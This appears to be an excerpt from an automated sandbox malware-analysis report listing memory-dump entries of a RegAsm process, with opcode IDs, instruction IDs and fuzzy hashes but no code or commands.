                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 78baf6bead69bc787f6e498b6209c58df4768a7a1f3029cd250c3ec1940b1aee
                                                            • Instruction ID: 3d8e549ead381eb5a41ee94ce64dad1362128fe91ea456cb5e2966e39e4c66ca
                                                            • Opcode Fuzzy Hash: 78baf6bead69bc787f6e498b6209c58df4768a7a1f3029cd250c3ec1940b1aee
                                                            • Instruction Fuzzy Hash: A3B12536A083129BC724CF28C88056BB7E2FF99700F19953DEA8697366E735DC06D785
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1235eeb8cf710a390d5557258a43f903d8b0ebafe0fc0a19c3d367544ede0ca8
                                                            • Instruction ID: a24f2a78553098ad8a5e3b5bc8abd089333314a4ae9ebed43d08ec28266042c4
                                                            • Opcode Fuzzy Hash: 1235eeb8cf710a390d5557258a43f903d8b0ebafe0fc0a19c3d367544ede0ca8
                                                            • Instruction Fuzzy Hash: 9D9126B1B04321ABD7209F20DD91B77B3A5EF91318F14482DE9869B381E7B9E904C75A
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 69f7ea7b3bcfd880a0eef8db25e79bddcc6229897a0f740fc9fa50f79ffe9049
                                                            • Instruction ID: 3187122ed07642cbe4dcf9e03264eeaa439871456ea8a6719abbd84e200541cd
                                                            • Opcode Fuzzy Hash: 69f7ea7b3bcfd880a0eef8db25e79bddcc6229897a0f740fc9fa50f79ffe9049
                                                            • Instruction Fuzzy Hash: 4EA11436A043018BC718DF28D99092BB3F2EBC9710F1A957DE9869B365EB35DC05CB46
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6c996c3f4605880eb5795293c8fc84fa0ba55b563aa94cfbc2b65958c9b9224e
                                                            • Instruction ID: 89cd8c3f6ac805753dcfa7ea52abb159a623b373aaffce4ab273b97bd3830c78
                                                            • Opcode Fuzzy Hash: 6c996c3f4605880eb5795293c8fc84fa0ba55b563aa94cfbc2b65958c9b9224e
                                                            • Instruction Fuzzy Hash: CFB10575608790DFD714DF24E891A2BB7E2EF8A314F488A6DF0D5872A2D7388905CB16
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 7757ad35b4d3f19014e5b0218f9aa537273a9f10abc5234e4bd6fc32e4c2e1b2
                                                            • Instruction ID: cf6a0fb400f3c0121e69896af41eb3d2a2b4280c5d577effd33442f2baf9bc8c
                                                            • Opcode Fuzzy Hash: 7757ad35b4d3f19014e5b0218f9aa537273a9f10abc5234e4bd6fc32e4c2e1b2
                                                            • Instruction Fuzzy Hash: CB81AE326053019BC7249F29C85067FB3A2FFC8710F2AD42DE9868B395EB349C52D785
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 28138e8c65325f641ce846c5d717fbfcd9e0028e0a671fa80ee9e5ed8af67cde
                                                            • Instruction ID: ba880319810bdb8e213e259538359e713a98a4b2945b2457ae3d4c78796ecc2a
                                                            • Opcode Fuzzy Hash: 28138e8c65325f641ce846c5d717fbfcd9e0028e0a671fa80ee9e5ed8af67cde
                                                            • Instruction Fuzzy Hash: 47512A357043008FE7188F28C89577BB7E2EB9A320F18A62ED5D597392D7389C41C78A
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 93ce565895c2d767d3f4f3cf703cee2db26bdababecfc0e7e91b354ce90ac481
                                                            • Instruction ID: 19c9bc1ea9186e56c23c5e66cc144f5345884b6a785bfb5c303e44cb60fc86fa
                                                            • Opcode Fuzzy Hash: 93ce565895c2d767d3f4f3cf703cee2db26bdababecfc0e7e91b354ce90ac481
                                                            • Instruction Fuzzy Hash: 915126746083009BE7109F29DC45B2BB7E6EB89704F14982DF5C597292DB39DC05CBAB
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fb453cfe87c3d4895fcef5adcba70af742de5fc44f30238646acffd3f92754e0
                                                            • Instruction ID: 6e37d88637f30dcf1ca5a39760ca9fc235c391d288c19f204446c63a880f3ae7
                                                            • Opcode Fuzzy Hash: fb453cfe87c3d4895fcef5adcba70af742de5fc44f30238646acffd3f92754e0
                                                            • Instruction Fuzzy Hash: 0951AE30B483648FD710DA28A480267BBD2DF95320F8A867ED4D44B3D6E67DD90DD389
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6719c340687af9c7671d69fd13b02110751ddfc4bfd7c22202d719cfaa6f9092
                                                            • Instruction ID: f5f621b67306c00f1b1f1892e0c4b111cdc11732c84e43f9357b9df5953cc386
                                                            • Opcode Fuzzy Hash: 6719c340687af9c7671d69fd13b02110751ddfc4bfd7c22202d719cfaa6f9092
                                                            • Instruction Fuzzy Hash: 3E7160B840AB848FE774DF04D45868ABBE0FB8A358F52991ED48C47311C7B92448CF9B
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: bd0ee31e4d4d6d9ac2fa2587f77cf37721911ca3e59ccc36e7bfb755614f87b6
                                                            • Instruction ID: 2e66319cfaede8187dee7502eb2bdf6532bbee011b37898b3e62ff9ec94ea10c
                                                            • Opcode Fuzzy Hash: bd0ee31e4d4d6d9ac2fa2587f77cf37721911ca3e59ccc36e7bfb755614f87b6
                                                            • Instruction Fuzzy Hash: 2C1166324092905AC314CB289940737BBE19B87310F584A5DF4D6E32E1D728CC028B8A
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                            • Instruction ID: 1bdb52c757136d0f491bb15e4131204bafb517a34a554dccf387603b88e59a22
                                                            • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                            • Instruction Fuzzy Hash: 4D11EC336055D40EC3198D3C84006657FD31AB7235F6953DAF4B89B2D3D5268DCA8359
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b077483ebbe41559666eb24632921f170fd341de44e0cb4593afb61e9b0962fb
                                                            • Instruction ID: 3de76f9d274b52e90d2ef9e87ec8d3366dafd7d2e10265ff4f1f4711345407d1
                                                            • Opcode Fuzzy Hash: b077483ebbe41559666eb24632921f170fd341de44e0cb4593afb61e9b0962fb
                                                            • Instruction Fuzzy Hash: 7601B1F570171147D720AE51A9C0B27B2B86FC0748F19443EEC4457342DB7DEC29869E
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7d6529698e20a6c769e7980251b0ca5e132cff0518f497c1ab8b00d6e4c79072
                                                            • Instruction ID: 34e981112378c59cf45707eac27e4188cbaca79d234523b47ecff1cb0040ee73
                                                            • Opcode Fuzzy Hash: 7d6529698e20a6c769e7980251b0ca5e132cff0518f497c1ab8b00d6e4c79072
                                                            • Instruction Fuzzy Hash: 59016DB9C00624EFEF00AF55DC01B9E77B6AB0A324F0414A5E508BB392D731ED10CB95
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3b41fa5205d4ae5a3fd68479d9a62f5c8f3548fe329d4af70c97534e327c91f5
                                                            • Instruction ID: 76115147780e5b0d0309e2a0309811062aead7e9691d40ac881d7231c88a4ab0
                                                            • Opcode Fuzzy Hash: 3b41fa5205d4ae5a3fd68479d9a62f5c8f3548fe329d4af70c97534e327c91f5
                                                            • Instruction Fuzzy Hash: 23E0D8FFD556600397548A235C02226B1936BDA628B1AB8788E9673707EA359C0741D8
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d3e382a35f6a7edaa88fbd4097d4fd738d9cf468eed6d2bef4b4d717b7d72e8c
                                                            • Instruction ID: 8488e0a8640df04fcf481087a0a0e2354c4894f8e99b76394d31cfc5082ce78b
                                                            • Opcode Fuzzy Hash: d3e382a35f6a7edaa88fbd4097d4fd738d9cf468eed6d2bef4b4d717b7d72e8c
                                                            • Instruction Fuzzy Hash: 6BE01279C11100BFDE046B11FC0161CBA72B76630BF46213AE40873232EF35A436A75D
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9580c00f8d87a75d1cefbcc58e71a064fbff43a3de15b5db8def70aaa11ec223